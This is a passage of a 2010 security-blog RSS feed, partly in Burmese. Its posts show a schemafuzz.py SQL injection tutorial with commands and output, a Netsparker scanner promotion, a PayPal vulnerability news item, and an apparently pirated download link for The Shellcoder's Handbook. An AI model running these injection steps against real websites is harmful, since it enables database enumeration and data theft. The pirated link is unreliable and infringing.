			return false;
		}
	
		if (button.id === 'facebook_share_button_86') {
			button.onmouseover = function(){
				this.style.color='#fff';
				this.style.borderColor = '#295582';
				this.style.backgroundColor = '#3b5998';
			}
			button.onmouseout = function(){
				this.style.color = '#3b5998';
				this.style.borderColor = '#d8dfea';
				this.style.backgroundColor = '#fff';
			}
		}
	}
	</script>
	]]></content:encoded>
			<wfw:commentRss>http://heinhtetaung.ulmb.com/?feed=rss2&amp;p=86</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How To use Schemafuzz</title>
		<link>http://heinhtetaung.ulmb.com/?p=64</link>
		<comments>http://heinhtetaung.ulmb.com/?p=64#comments</comments>
		<pubDate>Fri, 11 Jun 2010 14:09:17 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Main]]></category>

		<guid isPermaLink="false">http://heinhtetaung.ulmb.com/?p=64</guid>
		<description><![CDATA[ပထမဆံုး အသံုးျပဳရန္အတြက္ ေအာက္ကလင့္မွ ေဒါင္းလုပ္ျပဳလုပ္ပါ။
http://www.beenuarora.com/code/schemafuzz.py
after that&#8230;.
u can use&#8230;
like this :
parameter &#8211;findcol ကို အသံုးျပဳ ျပီး စတင္ scan လိုက္ပါ။
d0s@vps-1:# ./schemafuzz.py -u http://localhost/news.php?id=1 &#8211;findcol
ေအာက္ပါ ရလဒ္ကိုရရွိမွာ ျဖစ္ပါတယ္။
&#124;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#124;
&#124; rsauron[@]gmail[dot]com v5.0 &#124;
&#124; 6/2008 schemafuzz.py &#124;
&#124; -MySQL v5+ Information_schema Database Enumeration &#124;
&#124; -MySQL v4+ Data Extractor &#124;
&#124; -MySQL v4+ Table &#38; Column Fuzzer &#124;
&#124; Usage: schemafuzz.py [options] &#124;
&#124; -h help darkc0de.com &#124;
&#124;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#124;
[+] URL: [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://heinhtetaung.ulmb.com/wp-content/xss.jpg"><img src="http://heinhtetaung.ulmb.com/wp-content/xss-150x150.jpg" alt="Xss" title="xss" width="150" height="150" class="alignleft size-thumbnail wp-image-80" /></a>ပထမဆံုး အသံုးျပဳရန္အတြက္ ေအာက္ကလင့္မွ ေဒါင္းလုပ္ျပဳလုပ္ပါ။</p>
<p>http://www.beenuarora.com/code/schemafuzz.py</p>
<p>after that&#8230;.<br />
u can use&#8230;<br />
like this :</p>
<p>parameter &#8211;findcol ကို အသံုးျပဳ ျပီး စတင္ scan လိုက္ပါ။</p>
<p>d0s@vps-1:# ./schemafuzz.py -u http://localhost/news.php?id=1 &#8211;findcol</p>
<p>ေအာက္ပါ ရလဒ္ကိုရရွိမွာ ျဖစ္ပါတယ္။</p>
<p>|&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;|<br />
| rsauron[@]gmail[dot]com v5.0 |<br />
| 6/2008 schemafuzz.py |<br />
| -MySQL v5+ Information_schema Database Enumeration |<br />
| -MySQL v4+ Data Extractor |<br />
| -MySQL v4+ Table &amp; Column Fuzzer |<br />
| Usage: schemafuzz.py [options] |<br />
| -h help darkc0de.com |<br />
|&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;|</p>
<p>[+] URL: http://localhost/news.php?id=1&#8211;<br />
[+] Evasion Used: &#8220;+&#8221; &#8220;&#8211;&#8221;<br />
[+] 23:35:53<br />
[-] Proxy Not Given<br />
[+] Attempting To find the number of columns&#8230;<br />
[+] Testing: 0,1,2,3,<br />
[+] Column Length is: 4<br />
[+] Found null column at column #: 1<br />
[+] SQLi URL: http://localhost/news&#8230;+0,1,2,3&#8211;<br />
[+] darkc0de URL: http://localhost/news&#8230;rkc0de,2,3<br />
[-] Done!</p>
<p>အထက္တြင္ျပထားေသာ ပံုစံ အတိုင္း ထပ္မံ ရွာေဖြလိုက္ပါ ။ သင့္ လိုခ်င္ေသာ ေဒတာေဗ့ table နဲ႔ အသံုးျပဳ သူ အမည္ ကို ရရွိမွာ ျဖစ္ပါတယ္။</p>
<p>d0s@vps-1:# ./schemafuzz.py -u http://localhost/news&#8230;rkc0de,2,3</p>
<p>Quote:|&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;|<br />
| rsauron[@]gmail[dot]com v5.0 |<br />
| 6/2008 schemafuzz.py |<br />
| -MySQL v5+ Information_schema Database Enumeration |<br />
| -MySQL v4+ Data Extractor |<br />
| -MySQL v4+ Table &amp; Column Fuzzer |<br />
| Usage: schemafuzz.py [options] |<br />
| -h help darkc0de.com |<br />
|&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;|</p>
<p>[+] URL: http://localhost/news&#8230;c0de,2,3&#8211;<br />
[+] Evasion Used: &#8220;+&#8221; &#8220;&#8211;&#8221;<br />
[+] 23:43:22<br />
[-] Proxy Not Given<br />
[+] Gathering MySQL Server Configuration&#8230;<br />
Database: test-db<br />
User: test-db@localhost<br />
Version: 5.0.77-community<br />
[+] Number of tables names to be fuzzed: 338<br />
[+] Number of column names to be fuzzed: 249<br />
[+] Searching for tables and columns&#8230;</p>
<p>ထိုထက္ပိုပီး သိခ်င္လ်င္ ./schemafuzz.py -h ကို အသံုးျပဳလိုက္ပါ။</p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-wealth">
<ul class="socials">
		<li class="shr-blogger">
			<a href="http://www.blogger.com/blog_this.pyra?t&amp;u=http://heinhtetaung.ulmb.com/?p=64&amp;n=How+To+use+Schemafuzz&amp;pli=1" rel="nofollow" class="external" title="Blog this on Blogger">Blog this on Blogger</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://heinhtetaung.ulmb.com/?p=64&amp;feed=comments-rss2" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://heinhtetaung.ulmb.com/?p=64&amp;title=How+To+use+Schemafuzz" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://heinhtetaung.ulmb.com/?p=64&amp;t=How+To+use+Schemafuzz" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.google.com/bookmarks/mark?op=add&amp;bkmk=http://heinhtetaung.ulmb.com/?p=64&amp;title=How+To+use+Schemafuzz" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-myspace">
			<a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://heinhtetaung.ulmb.com/?p=64&amp;t=How+To+use+Schemafuzz" rel="nofollow" class="external" title="Post this to MySpace">Post this to MySpace</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=How+To+use+Schemafuzz+-+File: /data/app/webapp/functions.php<br />Line: 7<br />Message: Too many connections&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-yahoomail">
			<a href="http://compose.mail.yahoo.com/?Subject=How+To+use+Schemafuzz&amp;body=Link: http://heinhtetaung.ulmb.com/?p=64 (sent via shareaholic)%0D%0A%0D%0A----%0D%0A %E1%80%95%E1%80%91%E1%80%99%E1%80%86%E1%80%B6%E1%80%AF%E1%80%B8%20%E1%80%A1%E1%80%9E%E1%80%B6%E1%80%AF%E1%80%B8%E1%80%BB%E1%80%95%E1%80%B3%E1%80%9B%E1%80%94%E1%80%B9%E1%80%A1%E1%80%90%E1%80%BC%E1%80%80%E1%80%B9%20%E1%80%B1%E1%80%A1%E1%80%AC%E1%80%80%E1%80%B9%E1%80%80%E1%80%9C%E1%80%84%E1%80%B9%E1%80%B7%E1%80%99%E1%80%BD%20%E1%80%B1%E1%80%92%E1%80%AB%E1%80%84%E1%80%B9%E1%80%B8%E1%80%9C%E1%80%AF%E1%80%95%E1%80%B9%E1%80%BB%E1%80%95%E1%80%B3%E1%80%9C%E1%80%AF%E1%80%95%E1%80%B9%E1%80%95%E1%80%AB%E1%81%8B%0D%0A%0D%0Ahttp%3A%2F%2Fwww.beenuarora.com%2Fcode%2Fschemafuzz.py%0D%0A%0D%0Aafter%20that....%0D%0Au%20can%20use...%0D%0Alike%20this%20%3A%0D%0A%0D%0Aparameter%20--findcol%20%E1%80%80%E1%80%AD%E1%80%AF%20%E1%80%A1%E1%80" rel="nofollow" class="external" title="Email this via Yahoo! Mail">Email this via Yahoo! Mail</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://heinhtetaung.ulmb.com/?p=64&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

<a href="http://www.facebook.com/share.php?u=http%3A%2F%2Fheinhtetaung.ulmb.com%2F%3Fp%3D64&amp;t=How%20To%20use%20Schemafuzz" id="facebook_share_button_64" style="font-size:11px; line-height:13px; font-family:'lucida grande',tahoma,verdana,arial,sans-serif; text-decoration:none; display: -moz-inline-block; display:inline-block; padding:1px 20px 0 5px; margin: 5px 0; height:15px; border:1px solid #d8dfea; color: #3B5998; background: #fff url(http://b.static.ak.fbcdn.net/images/share/facebook_share_icon.gif) no-repeat top right;">Share</a>
	<script type="text/javascript">
	var button = document.getElementById('facebook_share_link_64') || document.getElementById('facebook_share_icon_64') || document.getElementById('facebook_share_both_64') || document.getElementById('facebook_share_button_64');
	if (button) {
		button.onclick = function(e) {
			var url = this.href.replace(/share\.php/, 'sharer.php');
			window.open(url,'sharer','toolbar=0,status=0,width=626,height=436');
			return false;
		}
	
		if (button.id === 'facebook_share_button_64') {
			button.onmouseover = function(){
				this.style.color='#fff';
				this.style.borderColor = '#295582';
				this.style.backgroundColor = '#3b5998';
			}
			button.onmouseout = function(){
				this.style.color = '#3b5998';
				this.style.borderColor = '#d8dfea';
				this.style.backgroundColor = '#fff';
			}
		}
	}
	</script>
	]]></content:encoded>
			<wfw:commentRss>http://heinhtetaung.ulmb.com/?feed=rss2&amp;p=64</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Netsparker Community Edition – Web Application Security Scanner</title>
		<link>http://heinhtetaung.ulmb.com/?p=30</link>
		<comments>http://heinhtetaung.ulmb.com/?p=30#comments</comments>
		<pubDate>Fri, 23 Apr 2010 09:01:58 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Vuln]]></category>

		<guid isPermaLink="false">http://heinhtetaung.ulmb.com/?p=30</guid>
		<description><![CDATA[Netsparker is a Web Application Security Scanner that claims to be False-Positive Free. The developers thought that if you need to investigate every single identified issue manually what’s the point of having an automated scanner? So they developed a new technology which can confirm vulnerabilities on demand which allowed us to develop the first false [...]]]></description>
			<content:encoded><![CDATA[<p>Netsparker is a Web Application Security Scanner that claims to be False-Positive Free. The developers thought that if you need to investigate every single identified issue manually what’s the point of having an automated scanner? So they developed a new technology which can confirm vulnerabilities on demand which allowed us to develop the first false positive free web application security scanner.</p>
<p>When Netsparker identifies an SQL Injection, it can identify how to exploit it automatically and extract the version information from the application. When the version is successfully extracted Netsparker will report the issue as confirmed so that you can make sure that the issue is not a false-positive.<br />
Same applies to other vulnerabilities such as XSS (Cross-site Scripting) where Netsparker loads the injection in an actual browser and observes the execution of JavaScript to confirm that the injection will actually get executed in the browser.</p>
<p>Thanks to its comprehensive and powerful JavaScript engine it’s possible to simulate a real attacker successfully. This means it can successfully analyse websites that rely on AJAX and JavaScript.</p>
<p>You don’t need to be a security expert, get training or read a long manual to start. Since the user interface is easy to use and can confirm and show you the impact, you can just fire it up and start using it.</p>
<p><img class="alignnone" title="Netspacker" src="http://farm5.static.flickr.com/4036/4534428226_9c666cf62b.jpg" alt="" width="500" height="343" /><br />
<a href="http://www.mavitunasecurity.com/communityedition/"> Download</a></p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-wealth">
<ul class="socials">
		<li class="shr-blogger">
			<a href="http://www.blogger.com/blog_this.pyra?t&amp;u=http://heinhtetaung.ulmb.com/?p=30&amp;n=Netsparker+Community+Edition+%E2%80%93+Web+Application+Security+Scanner&amp;pli=1" rel="nofollow" class="external" title="Blog this on Blogger">Blog this on Blogger</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://heinhtetaung.ulmb.com/?p=30&amp;feed=comments-rss2" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://heinhtetaung.ulmb.com/?p=30&amp;title=Netsparker+Community+Edition+%E2%80%93+Web+Application+Security+Scanner" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://heinhtetaung.ulmb.com/?p=30&amp;t=Netsparker+Community+Edition+%E2%80%93+Web+Application+Security+Scanner" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.google.com/bookmarks/mark?op=add&amp;bkmk=http://heinhtetaung.ulmb.com/?p=30&amp;title=Netsparker+Community+Edition+%E2%80%93+Web+Application+Security+Scanner" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-myspace">
			<a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://heinhtetaung.ulmb.com/?p=30&amp;t=Netsparker+Community+Edition+%E2%80%93+Web+Application+Security+Scanner" rel="nofollow" class="external" title="Post this to MySpace">Post this to MySpace</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=Netsparker+Community+Edition+%E2%80%93+Web+Application+Security+Scanner+-+http://b2l.me/3ckh5&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-yahoomail">
			<a href="http://compose.mail.yahoo.com/?Subject=Netsparker+Community+Edition+%E2%80%93+Web+Application+Security+Scanner&amp;body=Link: http://heinhtetaung.ulmb.com/?p=30 (sent via shareaholic)%0D%0A%0D%0A----%0D%0A Netsparker%20is%20a%20Web%20Application%20Security%20Scanner%20that%20claims%20to%20be%20False-Positive%20Free.%20The%20developers%20thought%20that%20if%20you%20need%20to%20investigate%20every%20single%20identified%20issue%20manually%20what%E2%80%99s%20the%20point%20of%20having%20an%20automated%20scanner%3F%20So%20they%20developed%20a%20new%20technology%20which%20can%20confirm%20vulnerabilitie" rel="nofollow" class="external" title="Email this via Yahoo! Mail">Email this via Yahoo! Mail</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://heinhtetaung.ulmb.com/?p=30&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

<a href="http://www.facebook.com/share.php?u=http%3A%2F%2Fheinhtetaung.ulmb.com%2F%3Fp%3D30&amp;t=Netsparker%20Community%20Edition%20%E2%80%93%20Web%20Application%20Security%20Scanner" id="facebook_share_button_30" style="font-size:11px; line-height:13px; font-family:'lucida grande',tahoma,verdana,arial,sans-serif; text-decoration:none; display: -moz-inline-block; display:inline-block; padding:1px 20px 0 5px; margin: 5px 0; height:15px; border:1px solid #d8dfea; color: #3B5998; background: #fff url(http://b.static.ak.fbcdn.net/images/share/facebook_share_icon.gif) no-repeat top right;">Share</a>
	<script type="text/javascript">
	var button = document.getElementById('facebook_share_link_30') || document.getElementById('facebook_share_icon_30') || document.getElementById('facebook_share_both_30') || document.getElementById('facebook_share_button_30');
	if (button) {
		button.onclick = function(e) {
			var url = this.href.replace(/share\.php/, 'sharer.php');
			window.open(url,'sharer','toolbar=0,status=0,width=626,height=436');
			return false;
		}
	
		if (button.id === 'facebook_share_button_30') {
			button.onmouseover = function(){
				this.style.color='#fff';
				this.style.borderColor = '#295582';
				this.style.backgroundColor = '#3b5998';
			}
			button.onmouseout = function(){
				this.style.color = '#3b5998';
				this.style.borderColor = '#d8dfea';
				this.style.backgroundColor = '#fff';
			}
		}
	}
	</script>
	]]></content:encoded>
			<wfw:commentRss>http://heinhtetaung.ulmb.com/?feed=rss2&amp;p=30</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PayPal Patches Critical Security Vulnerabilities</title>
		<link>http://heinhtetaung.ulmb.com/?p=27</link>
		<comments>http://heinhtetaung.ulmb.com/?p=27#comments</comments>
		<pubDate>Fri, 23 Apr 2010 08:36:06 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Main]]></category>
		<category><![CDATA[Vuln]]></category>

		<guid isPermaLink="false">http://heinhtetaung.ulmb.com/?p=27</guid>
		<description><![CDATA[PayPal in the news again for a series of fairly high-profile vulnerabilities discovered by the same guy that found the XSS bugs in Google Calendar and Twitter (Nir Goldshlager).
I’m glad people are looking at PayPal as I’m sure the volume of monetary transactions that pass through their site on a daily basis is huge. It’s [...]]]></description>
			<content:encoded><![CDATA[<p>PayPal in the news again for a series of fairly high-profile vulnerabilities discovered by the same guy that found the XSS bugs in Google Calendar and Twitter (Nir Goldshlager).</p>
<p>I’m glad people are looking at PayPal as I’m sure the volume of monetary transactions that pass through their site on a daily basis is huge. It’s still the leading payment processing solution, especially for International transactions.</p>
<p>Seems to be more on the business side rather than effecting users, but exposing so much customer is never a good thing. </p>
<blockquote><p>    A security researcher has uncovered multiple vulnerabilities affecting PayPal, the most critical of which could have enabled attackers to access PayPal’s business and premier reports back-end system.</p>
<p>    The vulnerabilities were patched recently by PayPal after security researcher Nir Goldshlager of Avnet Technologies brought the vulnerabilities to the site’s attention. The most critical bug was a permission flow problem in business.paypal.com, and could have potentially exposed a massive amount of customer data.</p>
<p>    “An attacker was able to access and watch any other user’s financial, orders and report information with unauthorized access to the report backend application,” Goldshlager explained. “When users have a premier account or business account the transaction details of their orders are saved in the reports application … an attacker can look at any finance reports of premier or business accounts in the PayPal reports application and get a full month [and] day summary of the orders reports.”<br />
    That includes information such as the PayPal buyer’s full shipping address, the PayPal transaction ID of the buyer and the date and amount of transaction.</p></blockquote>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-wealth">
<ul class="socials">
		<li class="shr-blogger">
			<a href="http://www.blogger.com/blog_this.pyra?t&amp;u=http://heinhtetaung.ulmb.com/?p=27&amp;n=PayPal+Patches+Critical+Security+Vulnerabilities&amp;pli=1" rel="nofollow" class="external" title="Blog this on Blogger">Blog this on Blogger</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://heinhtetaung.ulmb.com/?p=27&amp;feed=comments-rss2" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://heinhtetaung.ulmb.com/?p=27&amp;title=PayPal+Patches+Critical+Security+Vulnerabilities" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://heinhtetaung.ulmb.com/?p=27&amp;t=PayPal+Patches+Critical+Security+Vulnerabilities" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.google.com/bookmarks/mark?op=add&amp;bkmk=http://heinhtetaung.ulmb.com/?p=27&amp;title=PayPal+Patches+Critical+Security+Vulnerabilities" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-myspace">
			<a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://heinhtetaung.ulmb.com/?p=27&amp;t=PayPal+Patches+Critical+Security+Vulnerabilities" rel="nofollow" class="external" title="Post this to MySpace">Post this to MySpace</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=PayPal+Patches+Critical+Security+Vulnerabilities+-+http://b2l.me/3cf64&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-yahoomail">
			<a href="http://compose.mail.yahoo.com/?Subject=PayPal+Patches+Critical+Security+Vulnerabilities&amp;body=Link: http://heinhtetaung.ulmb.com/?p=27 (sent via shareaholic)%0D%0A%0D%0A----%0D%0A PayPal%20in%20the%20news%20again%20for%20a%20series%20of%20fairly%20high-profile%20vulnerabilities%20discovered%20by%20the%20same%20guy%20that%20found%20the%20XSS%20bugs%20in%20Google%20Calendar%20and%20Twitter%20%28Nir%20Goldshlager%29.%0D%0A%0D%0AI%E2%80%99m%20glad%20people%20are%20looking%20at%20PayPal%20as%20I%E2%80%99m%20sure%20the%20volume%20of%20monetary%20transactions%20that%20pass%20through%20their%20site%20" rel="nofollow" class="external" title="Email this via Yahoo! Mail">Email this via Yahoo! Mail</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://heinhtetaung.ulmb.com/?p=27&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

<a href="http://www.facebook.com/share.php?u=http%3A%2F%2Fheinhtetaung.ulmb.com%2F%3Fp%3D27&amp;t=PayPal%20Patches%20Critical%20Security%20Vulnerabilities" id="facebook_share_button_27" style="font-size:11px; line-height:13px; font-family:'lucida grande',tahoma,verdana,arial,sans-serif; text-decoration:none; display: -moz-inline-block; display:inline-block; padding:1px 20px 0 5px; margin: 5px 0; height:15px; border:1px solid #d8dfea; color: #3B5998; background: #fff url(http://b.static.ak.fbcdn.net/images/share/facebook_share_icon.gif) no-repeat top right;">Share</a>
	<script type="text/javascript">
	var button = document.getElementById('facebook_share_link_27') || document.getElementById('facebook_share_icon_27') || document.getElementById('facebook_share_both_27') || document.getElementById('facebook_share_button_27');
	if (button) {
		button.onclick = function(e) {
			var url = this.href.replace(/share\.php/, 'sharer.php');
			window.open(url,'sharer','toolbar=0,status=0,width=626,height=436');
			return false;
		}
	
		if (button.id === 'facebook_share_button_27') {
			button.onmouseover = function(){
				this.style.color='#fff';
				this.style.borderColor = '#295582';
				this.style.backgroundColor = '#3b5998';
			}
			button.onmouseout = function(){
				this.style.color = '#3b5998';
				this.style.borderColor = '#d8dfea';
				this.style.backgroundColor = '#fff';
			}
		}
	}
	</script>
	]]></content:encoded>
			<wfw:commentRss>http://heinhtetaung.ulmb.com/?feed=rss2&amp;p=27</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The Shellcoder’s Handbook Second Edition</title>
		<link>http://heinhtetaung.ulmb.com/?p=1</link>
		<comments>http://heinhtetaung.ulmb.com/?p=1#comments</comments>
		<pubDate>Wed, 16 Sep 2009 16:27:31 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Ebooks]]></category>
		<category><![CDATA[hack linux]]></category>
		<category><![CDATA[linux shell]]></category>
		<category><![CDATA[shell code]]></category>

		<guid isPermaLink="false">http://heinhtetaung.ulmb.com/?p=1</guid>
		<description><![CDATA[You have in your hands The Shellcoder’s Handbook Second Edition:
Discovering and Exploiting Security Holes. The first edition of this volume attempted to show the reader how security vulnerabilities are discovered and exploited, and this edition holds fast to that same objective. If you’re a skilled network auditor, software developer, or sysadmin and you want to [...]]]></description>
			<content:encoded><![CDATA[<p>You have in your hands The Shellcoder’s Handbook Second Edition:</p>
<p><img class="alignleft size-full wp-image-7" title="shell coders hand book" src="http://heinhtetaung.ulmb.com/wp-content/shell-coders-hand-book.gif" alt="shell coders hand book" width="181" height="215" />Discovering and Exploiting Security Holes. The first edition of this volume attempted to show the reader how security vulnerabilities are discovered and exploited, and this edition holds fast to that same objective. If you’re a skilled network auditor, software developer, or sysadmin and you want to understand how  bugs are found and how exploits work at the lowest level, you’ve come to the right place. So what’s this book about? Well, the preceding quotation more or less sums it up. This book is mostly concerned with arbitrary code execution vulnerabilities, by which we mean bugs, that allow attackers to run code of their choice on the target machine. This generally happens when a program interprets a piece of data as a part of the program— part of an http “Host” header becomes a return address, part of an email address becomes a function pointer, and so on. The program ends up executing the data the attacker supplied with  disastrous effects. The architecture of modern processors, operating systems,  and compilers lends itself toward this kind of problem— as the good Countess  wrote, “the symbols of operation are frequently also the symbols of the results of operations.” Of course, she was writing about the difficulty of discussing mathematics when the number “5” might also mean “raised to the power of 5” or “the fifth element of a series,” but the basic idea is the same. If  you confuse code and data, you’re in a world of trouble. So, this book is about code and data, and what happens when the two become confused.<br />
<a href=" http://rapidshare.com/files/280986326/Wiley.The.Shellcoders.Handbook.2nd.Edition.Aug.2007.pdf "><br />
</a></p>
<h3 style="text-align: center;"><a href=" http://rapidshare.com/files/280986326/Wiley.The.Shellcoders.Handbook.2nd.Edition.Aug.2007.pdf ">Download</a></h3>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-wealth">
<ul class="socials">
		<li class="shr-blogger">
			<a href="http://www.blogger.com/blog_this.pyra?t&amp;u=http://heinhtetaung.ulmb.com/?p=1&amp;n=The+Shellcoder%E2%80%99s+Handbook+Second+Edition&amp;pli=1" rel="nofollow" class="external" title="Blog this on Blogger">Blog this on Blogger</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://heinhtetaung.ulmb.com/?p=1&amp;feed=comments-rss2" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://heinhtetaung.ulmb.com/?p=1&amp;title=The+Shellcoder%E2%80%99s+Handbook+Second+Edition" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://heinhtetaung.ulmb.com/?p=1&amp;t=The+Shellcoder%E2%80%99s+Handbook+Second+Edition" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.google.com/bookmarks/mark?op=add&amp;bkmk=http://heinhtetaung.ulmb.com/?p=1&amp;title=The+Shellcoder%E2%80%99s+Handbook+Second+Edition" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-myspace">
			<a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://heinhtetaung.ulmb.com/?p=1&amp;t=The+Shellcoder%E2%80%99s+Handbook+Second+Edition" rel="nofollow" class="external" title="Post this to MySpace">Post this to MySpace</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=The+Shellcoder%E2%80%99s+Handbook+Second+Edition+-+http://b2l.me/29v8x&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-yahoomail">
			<a href="http://compose.mail.yahoo.com/?Subject=The+Shellcoder%E2%80%99s+Handbook+Second+Edition&amp;body=Link: http://heinhtetaung.ulmb.com/?p=1 (sent via shareaholic)%0D%0A%0D%0A----%0D%0A You%20have%20in%20your%20hands%20The%20Shellcoder%E2%80%99s%20Handbook%20Second%20Edition%3A%0D%0A%0D%0ADiscovering%20and%20Exploiting%20Security%20Holes.%20The%20first%20edition%20of%20this%20volume%20attempted%20to%20show%20the%20reader%20how%20security%20vulnerabilities%20are%20discovered%20and%20exploited%2C%20and%20this%20edition%20holds%20fast%20to%20that%20same%20objective.%20If%20you%E2%80%99re%20a%20" rel="nofollow" class="external" title="Email this via Yahoo! Mail">Email this via Yahoo! Mail</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://heinhtetaung.ulmb.com/?p=1&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

<a href="http://www.facebook.com/share.php?u=http%3A%2F%2Fheinhtetaung.ulmb.com%2F%3Fp%3D1&amp;t=The%20Shellcoder%E2%80%99s%20Handbook%20Second%20Edition" id="facebook_share_button_1" style="font-size:11px; line-height:13px; font-family:'lucida grande',tahoma,verdana,arial,sans-serif; text-decoration:none; display: -moz-inline-block; display:inline-block; padding:1px 20px 0 5px; margin: 5px 0; height:15px; border:1px solid #d8dfea; color: #3B5998; background: #fff url(http://b.static.ak.fbcdn.net/images/share/facebook_share_icon.gif) no-repeat top right;">Share</a>
	<script type="text/javascript">
	var button = document.getElementById('facebook_share_link_1') || document.getElementById('facebook_share_icon_1') || document.getElementById('facebook_share_both_1') || document.getElementById('facebook_share_button_1');
	if (button) {
		button.onclick = function(e) {
